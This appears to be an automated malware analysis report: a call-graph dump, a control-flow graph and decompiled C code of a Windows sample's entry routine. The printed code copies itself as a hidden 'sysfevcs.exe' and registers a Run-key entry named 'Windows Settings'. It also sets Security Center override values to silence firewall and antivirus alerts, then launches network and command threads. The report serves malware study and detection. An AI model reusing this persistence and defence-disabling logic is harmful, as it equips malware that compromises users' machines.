5853->5854 5855 40dcff 5853->5855 5854->5847 5856 408820 7 API calls 5855->5856 5857 40dd09 5856->5857 5858 40dd16 getpeername CreateIoCompletionPort 5857->5858 5859 40dda8 5857->5859 5861 40dda2 5858->5861 5862 40dd56 5858->5862 5883 409320 shutdown closesocket 5859->5883 5863 408990 __aligned_recalloc_base 3 API calls 5861->5863 5881 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5862->5881 5863->5859 5864 40ddb3 5864->5847 5866 40dd5b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5882 40dbd0 EnterCriticalSection LeaveCriticalSection 5866->5882 5868 40dd9b 5868->5847 5870 40e030 5869->5870 5877 40e101 5869->5877 5871 40e03d InterlockedExchangeAdd 5870->5871 5870->5877 5871->5877 5878 40e054 5871->5878 5872 40e080 5873 40e091 5872->5873 5893 409320 shutdown closesocket 5872->5893 5874 40e0a7 InterlockedDecrement 5873->5874 5873->5877 5874->5877 5877->5834 5878->5872 5878->5877 5884 40dfa0 EnterCriticalSection 5878->5884 5879->5845 5880->5845 5881->5866 5882->5868 5883->5864 5885 40e007 LeaveCriticalSection 5884->5885 5886 40dfba InterlockedExchangeAdd 5884->5886 5885->5878 5887 40dfca LeaveCriticalSection 5886->5887 5888 40dfd9 5886->5888 5887->5878 5889 408990 __aligned_recalloc_base 3 API calls 5888->5889 5890 40dffe 5889->5890 5891 408990 __aligned_recalloc_base 3 API calls 5890->5891 5892 40e004 5891->5892 5892->5885 5893->5873 5534 40c461 5536 40c46a 5534->5536 5535 40c55d 5536->5535 5537 40c4d3 lstrcmpiW 5536->5537 5538 40c553 SysFreeString 5537->5538 5539 40c4e6 5537->5539 5538->5535 5540 40bf20 2 API calls 5539->5540 5542 40c4f4 5540->5542 5541 40c545 5541->5538 5542->5538 5542->5541 5543 40c523 lstrcmpiW 5542->5543 5544 40c535 5543->5544 5545 40c53b SysFreeString 5543->5545 5544->5545 5545->5541 5894 405226 5895 405208 5894->5895 5896 405348 Sleep 5895->5896 5897 405239 5895->5897 5899 405358 ExitThread 5895->5899 5902 4049e0 4 API calls 5895->5902 5896->5895 5898 404980 4 API calls 5897->5898 5900 40524a 5898->5900 5901 405270 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5900->5901 5903 40526b 5900->5903 5904 4052e6 wsprintfW 5901->5904 5905 4052fb wsprintfW 5901->5905 5902->5895 5904->5905 5906 404cf0 49 API calls 5905->5906 5906->5903 5907 405b26 ExitThread 5546 4050eb 5547 404feb 5546->5547 5548 405082 PathMatchSpecW 5547->5548 5549 405100 PathFileExistsW 5547->5549 5551 405196 FindNextFileW 5547->5551 5557 404bb0 11 API calls 5547->5557 5559 40501b lstrcmpiW 5547->5559 5548->5547 5550 4050a3 wsprintfW SetFileAttributesW DeleteFileW 5548->5550 5549->5547 5552 405116 wsprintfW wsprintfW 5549->5552 5550->5547 5554 4051b2 FindClose 5551->5554 5555 404fbf lstrcmpW 5551->5555 5552->5547 5553 405180 MoveFileExW 5552->5553 5553->5551 5558 4051bf 5554->5558 5555->5547 5556 404fd5 lstrcmpW 5555->5556 5556->5547 5557->5547 5559->5547 5564 408a6e 5565 408990 __aligned_recalloc_base 3 API calls 5564->5565 5568 408a2d 5565->5568 5566 408a42 5567 408840 __aligned_recalloc_base 7 API calls 5567->5568 5568->5566 5568->5567 5569 408a44 memcpy 5568->5569 5569->5568 5570 40b670 5571 40b687 5570->5571 5585 40b6de 5570->5585 5572 40b691 5571->5572 5573 40b6e3 5571->5573 5574 40b72d 5571->5574 5571->5585 5577 408820 7 API calls 5572->5577 5575 40b708 5573->5575 5576 40b6fb InterlockedDecrement 5573->5576 5603 40a2d0 5574->5603 5579 408990 __aligned_recalloc_base 3 API calls 5575->5579 5576->5575 5580 40b69e 5577->5580 5581 40b714 5579->5581 5592 40ddc0 5580->5592 5583 408990 __aligned_recalloc_base 3 API calls 5581->5583 5583->5585 5588 40b6cb InterlockedIncrement 5588->5585 5589 409f30 117 API calls 5590 40b753 5589->5590 5590->5585 5590->5589 5608 40a3d0 5590->5608 5593 40ddc4 5592->5593 5594 40b6b0 5592->5594 5593->5594 5595 40ddd5 InterlockedIncrement 5593->5595 5596 409610 5594->5596 5595->5594 5597 409490 2 API calls 5596->5597 5598 40961f 5597->5598 5599 409629 5598->5599 5600 40962d EnterCriticalSection 5598->5600 5599->5585 5599->5588 5602 40964c LeaveCriticalSection 5600->5602 5602->5599 5604 40a2e3 5603->5604 5605 40a30d memcpy 5603->5605 5606 408880 9 API calls 5604->5606 5605->5590 5607 40a304 5606->5607 5607->5605 5609 40a3f9 5608->5609 5610 40a3ee 5608->5610 5609->5610 5611 40a411 memmove 5609->5611 5610->5590 5611->5610 5612 40d7f0 5613 40d805 ioctlsocket 5612->5613 5614 40d8d0 5613->5614 5620 40d82a 5613->5620 5615 408990 __aligned_recalloc_base 3 API calls 5614->5615 5617 40d8d6 5615->5617 5616 40d8b9 WaitForSingleObject 5616->5613 5616->5614 5618 40d854 recvfrom 5618->5616 5618->5620 5619 408880 9 API calls 5619->5620 5620->5616 5620->5618 5620->5619 5621 40d899 InterlockedExchangeAdd 5620->5621 5623 40d6c0 5621->5623 5624 40d6f5 5623->5624 5625 40d71f 5624->5625 5627 408820 7 API calls 5624->5627 5633 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5625->5633 5627->5625 5628 40d742 5634 40db50 5628->5634 5630 40d7de 5630->5620 5631 40d755 5631->5630 5632 40d7cb memmove 5631->5632 5632->5631 5633->5628 5635 40db62 5634->5635 5636 40db75 memcpy 5634->5636 5637 408880 9 API calls 5635->5637 5639 40db91 5636->5639 5638 40db6f 5637->5638 5638->5636 5639->5631 5908 40bc30 5918 40da90 5908->5918 5910 40bc3e 5911 40bcbd 5910->5911 5912 4099a0 5 API calls 5910->5912 5913 40bc58 InterlockedExchangeAdd 5910->5913 5914 40bc9c WaitForSingleObject 5910->5914 5916 409dd0 13 API calls 5910->5916 5912->5910 5913->5910 5913->5914 5914->5910 5915 40bcb5 5914->5915 5917 40da20 8 API calls 5915->5917 5916->5910 5917->5911 5919 408820 7 API calls 5918->5919 5920 40da9b CreateEventA socket 5919->5920 5921 40dad2 5920->5921 5925 40dad7 5920->5925 5922 40da20 8 API calls 5921->5922 5922->5925 5923 40db3a 5923->5910 5924 40dadd bind 5926 40db10 5924->5926 5927 40db1c CreateThread 5924->5927 5925->5923 5925->5924 5928 40da20 8 API calls 5926->5928 5927->5923 5929 40db15 5928->5929 5929->5910 5930 40bbb0 5933 40d8f0 5930->5933 5932 40bbd1 5934 40d90f 5933->5934 5947 40da03 5933->5947 5935 408840 __aligned_recalloc_base 7 API calls 5934->5935 5934->5947 5936 40d936 memcpy htons 5935->5936 5937 40d9dc 5936->5937 5938 40d986 sendto 5936->5938 5939 408990 __aligned_recalloc_base 3 API calls 5937->5939 5940 40d9a5 InterlockedExchangeAdd 5938->5940 5941 40d9d8 5938->5941 5942 40d9eb 5939->5942 5940->5938 5943 40d9bb 5940->5943 5941->5937 5944 40d9f9 5941->5944 5942->5932 5946 408990 __aligned_recalloc_base 3 API calls 5943->5946 5945 408990 __aligned_recalloc_base 3 API calls 5944->5945 5945->5947 5948 40d9ca 5946->5948 5947->5932 5948->5932 5949 4045b0 5951 40454b 5949->5951 5950 408990 __aligned_recalloc_base 3 API calls 5952 4045bb LeaveCriticalSection 5950->5952 5951->5950 5640 4047fc 5643 4046fc 5640->5643 5641 4047f3 5642 40481c 5641->5642 5644 404210 15 API calls 5641->5644 5645 408990 __aligned_recalloc_base 3 API calls 5642->5645 5643->5641 5646 408990 __aligned_recalloc_base 3 API calls 5643->5646 5644->5642 5647 40483d 5645->5647 5648 404752 5646->5648 5649 40484c CreateFileW 5647->5649 5650 4048de LeaveCriticalSection 5647->5650 5651 408a00 8 API calls 5648->5651 5649->5650 5652 40486f 5649->5652 5653 404762 5651->5653 5656 4048ca FlushFileBuffers CloseHandle 5652->5656 5657 40488c WriteFile 5652->5657 5654 408990 __aligned_recalloc_base 3 API calls 5653->5654 5655 404789 5654->5655 5658 40a8a0 7 API calls 5655->5658 5656->5650 5657->5652 5659 4047c0 5658->5659 5660 4059c0 10 API calls 5659->5660 5660->5641

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 0 405b40-405b5e Sleep 1 405b68-405b74 0->1 2 405b76-405b83 PathFileExistsW 1->2 3 405bbc-405bdc CreateMutexA GetLastError 1->3 6 405b85-405ba5 DeleteFileW DeleteFileA MoveFileA 2->6 7 405bab-405bba 2->7 4 405be6-405c6b GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 3->4 5 405bde-405be0 ExitProcess 3->5 8 405c71-405c8a 4->8 6->7 7->1 9 405cd7-405cdc 8->9 10 405c8c-405c94 8->10 13 405ce2-405cf5 9->13 11 405c96-405cb1 10->11 12 405ccb-405cd5 10->12 11->9 14 405cb3-405cc9 11->14 12->13 15 405cfb-405d06 call 40ce10 13->15 16 405f5e-405f89 Sleep RegOpenKeyExA 13->16 14->8 14->12 24 405d10-405d5e ExpandEnvironmentStringsW wsprintfW CopyFileW 15->24 25 405d08-405d0a ExitProcess 15->25 17 406075-406095 RegOpenKeyExA 16->17 18 405f8f-40606f RegSetValueExA * 7 RegCloseKey 16->18 20 406181-406196 Sleep call 40aee0 17->20 21 40609b-40617b RegSetValueExA * 7 RegCloseKey 17->21 18->17 29 4062ec-4062f5 20->29 30 40619c-4062e9 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 404320 call 40cd40 call 4058d0 CreateEventA call 40a610 call 40b810 call 409a60 call 40b8c0 * 4 20->30 21->20 27 405d64-405d93 SetFileAttributesW RegOpenKeyExW 24->27 28 405e3d-405e7f Sleep wsprintfW CopyFileW 24->28 32 405d99-405dae 27->32 33 405e1e-405e33 call 40d0b0 27->33 28->16 31 405e85-405eb4 SetFileAttributesW RegOpenKeyExW 28->31 30->29 37 405eba-405ecf 31->37 38 405f3f-405f54 call 40d0b0 31->38 34 405db4-405dd3 32->34 33->28 46 405e35-405e37 ExitProcess 33->46 34->34 40 405dd5-405e18 RegSetValueExW RegCloseKey 34->40 43 405ed5-405ef4 37->43 38->16 51 405f56-405f58 ExitProcess 38->51 40->33 43->43 48 405ef6-405f39 RegSetValueExW RegCloseKey 43->48 48->38
                                                                                                                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                                                                                                                  			_entry_() {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				char _v528;
                                                                                                                                                                                                                                                                  				int _v532;
                                                                                                                                                                                                                                                                  				int _v536;
                                                                                                                                                                                                                                                                  				char _v1060;
                                                                                                                                                                                                                                                                  				void* _v1064;
                                                                                                                                                                                                                                                                  				char _v1588;
                                                                                                                                                                                                                                                                  				short _v2108;
                                                                                                                                                                                                                                                                  				intOrPtr _v2112;
                                                                                                                                                                                                                                                                  				short _v2636;
                                                                                                                                                                                                                                                                  				void* _v2640;
                                                                                                                                                                                                                                                                  				char _v3044;
                                                                                                                                                                                                                                                                  				char _v3048;
                                                                                                                                                                                                                                                                  				int _v3052;
                                                                                                                                                                                                                                                                  				short _v3054;
                                                                                                                                                                                                                                                                  				short _v3056;
                                                                                                                                                                                                                                                                  				int _v3060;
                                                                                                                                                                                                                                                                  				int _v3064;
                                                                                                                                                                                                                                                                  				intOrPtr* _v3068;
                                                                                                                                                                                                                                                                  				intOrPtr _v3072;
                                                                                                                                                                                                                                                                  				short _v3074;
                                                                                                                                                                                                                                                                  				signed int _v3080;
                                                                                                                                                                                                                                                                  				intOrPtr* _v3084;
                                                                                                                                                                                                                                                                  				intOrPtr _v3088;
                                                                                                                                                                                                                                                                  				short _v3090;
                                                                                                                                                                                                                                                                  				signed int _v3096;
                                                                                                                                                                                                                                                                  				void* _t121;
                                                                                                                                                                                                                                                                  				int _t129;
                                                                                                                                                                                                                                                                  				signed char _t192;
                                                                                                                                                                                                                                                                  				signed char _t203;
                                                                                                                                                                                                                                                                  				int _t210;
                                                                                                                                                                                                                                                                  				short _t215;
                                                                                                                                                                                                                                                                  				short _t245;
                                                                                                                                                                                                                                                                  				void* _t278;
                                                                                                                                                                                                                                                                  				void* _t279;
                                                                                                                                                                                                                                                                  				void* _t286;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                  				_v536 = 0;
                                                                                                                                                                                                                                                                  				_v2112 = 0x2382;
                                                                                                                                                                                                                                                                  				while(_v536 < _v2112) {
                                                                                                                                                                                                                                                                  					_t210 = PathFileExistsW(L"2596396235629365635"); // executed
                                                                                                                                                                                                                                                                  					if(_t210 != 0) {
                                                                                                                                                                                                                                                                  						DeleteFileW(L"246266396537");
                                                                                                                                                                                                                                                                  						DeleteFileA("2352338747374");
                                                                                                                                                                                                                                                                  						MoveFileA("2959359672365276", "2346836423674");
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v536 = _v536 + 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t121 = CreateMutexA(0, 0, "5858874"); // executed
                                                                                                                                                                                                                                                                  				_v2640 = _t121;
                                                                                                                                                                                                                                                                  				if(GetLastError() != 0xb7) {
                                                                                                                                                                                                                                                                  					_v1064 = 0;
                                                                                                                                                                                                                                                                  					_v528 = 1;
                                                                                                                                                                                                                                                                  					GetModuleFileNameW(0, 0x413590, 0x105);
                                                                                                                                                                                                                                                                  					_v532 = PathFindFileNameW(0x413590);
                                                                                                                                                                                                                                                                  					wsprintfW( &_v524, L"%s:Zone.Identifier", 0x413590);
                                                                                                                                                                                                                                                                  					_t279 = _t278 + 0xc;
                                                                                                                                                                                                                                                                  					DeleteFileW( &_v524);
                                                                                                                                                                                                                                                                  					ExpandEnvironmentStringsW(L"%userprofile%",  &_v2636, 0x104);
                                                                                                                                                                                                                                                                  					_v3048 = L"sysfevcs.exe";
                                                                                                                                                                                                                                                                  					_v3052 = _v532;
                                                                                                                                                                                                                                                                  					while(1) {
                                                                                                                                                                                                                                                                  						_t129 = _v3052;
                                                                                                                                                                                                                                                                  						_t215 =  *_t129;
                                                                                                                                                                                                                                                                  						_v3054 = _t215;
                                                                                                                                                                                                                                                                  						_t19 =  &_v3048; // 0x412bec
                                                                                                                                                                                                                                                                  						if(_t215 !=  *((intOrPtr*)( *_t19))) {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(_v3054 == 0) {
                                                                                                                                                                                                                                                                  							L12:
                                                                                                                                                                                                                                                                  							_v3060 = 0;
                                                                                                                                                                                                                                                                  							L14:
                                                                                                                                                                                                                                                                  							_v3064 = _v3060;
                                                                                                                                                                                                                                                                  							if(_v3064 == 0) {
                                                                                                                                                                                                                                                                  								L31:
                                                                                                                                                                                                                                                                  								Sleep(0x1f4);
                                                                                                                                                                                                                                                                  								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006,  &_v1064) == 0) {
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center\\Svc", 0, 0x20006,  &_v1064) == 0) {
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								Sleep(0x1f4);
                                                                                                                                                                                                                                                                  								if((E0040AEE0() & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  									__imp__#115(0x202,  &_v3044);
                                                                                                                                                                                                                                                                  									wsprintfW(0x4137a0, L"%s\\tbnds.dat",  &_v2636);
                                                                                                                                                                                                                                                                  									wsprintfW(0x413180, L"%s\\tbcmds.dat",  &_v2636);
                                                                                                                                                                                                                                                                  									CreateThread(0, 0, E00404120, 0, 0, 0);
                                                                                                                                                                                                                                                                  									Sleep(0x3e8);
                                                                                                                                                                                                                                                                  									CreateThread(0, 0, E004051D0, 0, 0, 0);
                                                                                                                                                                                                                                                                  									Sleep(0x3e8);
                                                                                                                                                                                                                                                                  									CreateThread(0, 0, E00405A20, 0, 0, 0);
                                                                                                                                                                                                                                                                  									Sleep(0x2710);
                                                                                                                                                                                                                                                                  									E00404320();
                                                                                                                                                                                                                                                                  									E004058D0(E0040CD40(),  &_v2636);
                                                                                                                                                                                                                                                                  									 *0x4139c4 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                  									 *0x4139cc = E0040A610( &_v2636);
                                                                                                                                                                                                                                                                  									 *0x4139c8 = E0040B810( &_v2636);
                                                                                                                                                                                                                                                                  									E00409A60();
                                                                                                                                                                                                                                                                  									E0040B8C0( *0x4139c8, 0, E0040BCD0, 0, 0, 0);
                                                                                                                                                                                                                                                                  									E0040B8C0( *0x4139c8, 0, E0040BC30, 0, 0, 0);
                                                                                                                                                                                                                                                                  									E0040B8C0( *0x4139c8, 0, E0040B7C0, 0, 0, 0);
                                                                                                                                                                                                                                                                  									E0040B8C0( *0x4139c8, 0, E0040B5C0, 0, 0, 0);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								return 0;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if((E0040CE10() & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                  								ExpandEnvironmentStringsW(L"%windir%",  &_v2108, 0x104);
                                                                                                                                                                                                                                                                  								wsprintfW( &_v1588, L"%s\\%s",  &_v2108, L"sysfevcs.exe");
                                                                                                                                                                                                                                                                  								_t286 = _t279 + 0x10;
                                                                                                                                                                                                                                                                  								if(CopyFileW(0x413590,  &_v1588, 0) == 0) {
                                                                                                                                                                                                                                                                  									L24:
                                                                                                                                                                                                                                                                  									Sleep(0x1f4);
                                                                                                                                                                                                                                                                  									wsprintfW( &_v1060, L"%s\\%s",  &_v2636, L"sysfevcs.exe");
                                                                                                                                                                                                                                                                  									_t279 = _t286 + 0x10;
                                                                                                                                                                                                                                                                  									if(CopyFileW(0x413590,  &_v1060, 0) == 0) {
                                                                                                                                                                                                                                                                  										goto L31;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									SetFileAttributesW( &_v1060, 3);
                                                                                                                                                                                                                                                                  									if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                                                                                                                                                                                                  										L29:
                                                                                                                                                                                                                                                                  										_t192 = E0040D0B0( &_v1060);
                                                                                                                                                                                                                                                                  										_t279 = _t279 + 4;
                                                                                                                                                                                                                                                                  										if((_t192 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                  											goto L31;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										ExitProcess(0);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_v3084 =  &_v1060;
                                                                                                                                                                                                                                                                  									_v3088 = _v3084 + 2;
                                                                                                                                                                                                                                                                  									do {
                                                                                                                                                                                                                                                                  										_v3090 =  *_v3084;
                                                                                                                                                                                                                                                                  										_v3084 = _v3084 + 2;
                                                                                                                                                                                                                                                                  									} while (_v3090 != 0);
                                                                                                                                                                                                                                                                  									_v3096 = _v3084 - _v3088 >> 1;
                                                                                                                                                                                                                                                                  									RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1060, _v3096 + _v3096 + 2);
                                                                                                                                                                                                                                                                  									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                  									goto L29;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								SetFileAttributesW( &_v1588, 3);
                                                                                                                                                                                                                                                                  								if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                                                                                                                                                                                                  									L22:
                                                                                                                                                                                                                                                                  									_t203 = E0040D0B0( &_v1588);
                                                                                                                                                                                                                                                                  									_t286 = _t286 + 4;
                                                                                                                                                                                                                                                                  									if((_t203 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                  										goto L24;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									ExitProcess(0);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_v3068 =  &_v1588;
                                                                                                                                                                                                                                                                  								_v3072 = _v3068 + 2;
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									_v3074 =  *_v3068;
                                                                                                                                                                                                                                                                  									_v3068 = _v3068 + 2;
                                                                                                                                                                                                                                                                  								} while (_v3074 != 0);
                                                                                                                                                                                                                                                                  								_v3080 = _v3068 - _v3072 >> 1;
                                                                                                                                                                                                                                                                  								RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1588, _v3080 + _v3080 + 2);
                                                                                                                                                                                                                                                                  								RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                  								goto L22;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							ExitProcess(0);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t129 = _v3052;
                                                                                                                                                                                                                                                                  						_t245 =  *((intOrPtr*)(_t129 + 2));
                                                                                                                                                                                                                                                                  						_v3056 = _t245;
                                                                                                                                                                                                                                                                  						_t24 =  &_v3048; // 0x412bec
                                                                                                                                                                                                                                                                  						if(_t245 !=  *((intOrPtr*)( *_t24 + 2))) {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v3052 = _v3052 + 4;
                                                                                                                                                                                                                                                                  						_v3048 = _v3048 + 4;
                                                                                                                                                                                                                                                                  						if(_v3056 != 0) {
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  					asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                                                                                  					_v3060 = _t129;
                                                                                                                                                                                                                                                                  					goto L14;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				ExitProcess(0); // executed
                                                                                                                                                                                                                                                                  			}







































                                                                                                                                                                                                                                                                  0x00405b4e
                                                                                                                                                                                                                                                                  0x00405b54
                                                                                                                                                                                                                                                                  0x00405b5e
                                                                                                                                                                                                                                                                  0x00405b68
                                                                                                                                                                                                                                                                  0x00405b7b
                                                                                                                                                                                                                                                                  0x00405b83
                                                                                                                                                                                                                                                                  0x00405b8a
                                                                                                                                                                                                                                                                  0x00405b95
                                                                                                                                                                                                                                                                  0x00405ba5
                                                                                                                                                                                                                                                                  0x00405ba5
                                                                                                                                                                                                                                                                  0x00405bb4
                                                                                                                                                                                                                                                                  0x00405bb4
                                                                                                                                                                                                                                                                  0x00405bc5
                                                                                                                                                                                                                                                                  0x00405bcb
                                                                                                                                                                                                                                                                  0x00405bdc
                                                                                                                                                                                                                                                                  0x00405be6
                                                                                                                                                                                                                                                                  0x00405bf0
                                                                                                                                                                                                                                                                  0x00405c06
                                                                                                                                                                                                                                                                  0x00405c17
                                                                                                                                                                                                                                                                  0x00405c2e
                                                                                                                                                                                                                                                                  0x00405c34
                                                                                                                                                                                                                                                                  0x00405c3e
                                                                                                                                                                                                                                                                  0x00405c55
                                                                                                                                                                                                                                                                  0x00405c5b
                                                                                                                                                                                                                                                                  0x00405c6b
                                                                                                                                                                                                                                                                  0x00405c71
                                                                                                                                                                                                                                                                  0x00405c71
                                                                                                                                                                                                                                                                  0x00405c77
                                                                                                                                                                                                                                                                  0x00405c7a
                                                                                                                                                                                                                                                                  0x00405c81
                                                                                                                                                                                                                                                                  0x00405c8a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405c94
                                                                                                                                                                                                                                                                  0x00405ccb
                                                                                                                                                                                                                                                                  0x00405ccb
                                                                                                                                                                                                                                                                  0x00405ce2
                                                                                                                                                                                                                                                                  0x00405ce8
                                                                                                                                                                                                                                                                  0x00405cf5
                                                                                                                                                                                                                                                                  0x00405f5e
                                                                                                                                                                                                                                                                  0x00405f63
                                                                                                                                                                                                                                                                  0x00405f89
                                                                                                                                                                                                                                                                  0x00405fa8
                                                                                                                                                                                                                                                                  0x00405fc7
                                                                                                                                                                                                                                                                  0x00405fe6
                                                                                                                                                                                                                                                                  0x00406005
                                                                                                                                                                                                                                                                  0x00406024
                                                                                                                                                                                                                                                                  0x00406043
                                                                                                                                                                                                                                                                  0x00406062
                                                                                                                                                                                                                                                                  0x0040606f
                                                                                                                                                                                                                                                                  0x0040606f
                                                                                                                                                                                                                                                                  0x00406095
                                                                                                                                                                                                                                                                  0x004060b4
                                                                                                                                                                                                                                                                  0x004060d3
                                                                                                                                                                                                                                                                  0x004060f2
                                                                                                                                                                                                                                                                  0x00406111
                                                                                                                                                                                                                                                                  0x00406130
                                                                                                                                                                                                                                                                  0x0040614f
                                                                                                                                                                                                                                                                  0x0040616e
                                                                                                                                                                                                                                                                  0x0040617b
                                                                                                                                                                                                                                                                  0x0040617b
                                                                                                                                                                                                                                                                  0x00406186
                                                                                                                                                                                                                                                                  0x00406196
                                                                                                                                                                                                                                                                  0x004061a8
                                                                                                                                                                                                                                                                  0x004061bf
                                                                                                                                                                                                                                                                  0x004061d9
                                                                                                                                                                                                                                                                  0x004061f1
                                                                                                                                                                                                                                                                  0x004061fc
                                                                                                                                                                                                                                                                  0x00406211
                                                                                                                                                                                                                                                                  0x0040621c
                                                                                                                                                                                                                                                                  0x00406231
                                                                                                                                                                                                                                                                  0x0040623c
                                                                                                                                                                                                                                                                  0x00406242
                                                                                                                                                                                                                                                                  0x0040624c
                                                                                                                                                                                                                                                                  0x0040625f
                                                                                                                                                                                                                                                                  0x00406269
                                                                                                                                                                                                                                                                  0x00406273
                                                                                                                                                                                                                                                                  0x00406278
                                                                                                                                                                                                                                                                  0x00406291
                                                                                                                                                                                                                                                                  0x004062ac
                                                                                                                                                                                                                                                                  0x004062c8
                                                                                                                                                                                                                                                                  0x004062e4
                                                                                                                                                                                                                                                                  0x004062e9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004062f0
                                                                                                                                                                                                                                                                  0x00405d06
                                                                                                                                                                                                                                                                  0x00405d21
                                                                                                                                                                                                                                                                  0x00405d3f
                                                                                                                                                                                                                                                                  0x00405d45
                                                                                                                                                                                                                                                                  0x00405d5e
                                                                                                                                                                                                                                                                  0x00405e3d
                                                                                                                                                                                                                                                                  0x00405e42
                                                                                                                                                                                                                                                                  0x00405e60
                                                                                                                                                                                                                                                                  0x00405e66
                                                                                                                                                                                                                                                                  0x00405e7f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405e8e
                                                                                                                                                                                                                                                                  0x00405eb4
                                                                                                                                                                                                                                                                  0x00405f3f
                                                                                                                                                                                                                                                                  0x00405f46
                                                                                                                                                                                                                                                                  0x00405f4b
                                                                                                                                                                                                                                                                  0x00405f54
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405f58
                                                                                                                                                                                                                                                                  0x00405f58
                                                                                                                                                                                                                                                                  0x00405ec0
                                                                                                                                                                                                                                                                  0x00405ecf
                                                                                                                                                                                                                                                                  0x00405ed5
                                                                                                                                                                                                                                                                  0x00405ede
                                                                                                                                                                                                                                                                  0x00405ee5
                                                                                                                                                                                                                                                                  0x00405eec
                                                                                                                                                                                                                                                                  0x00405f04
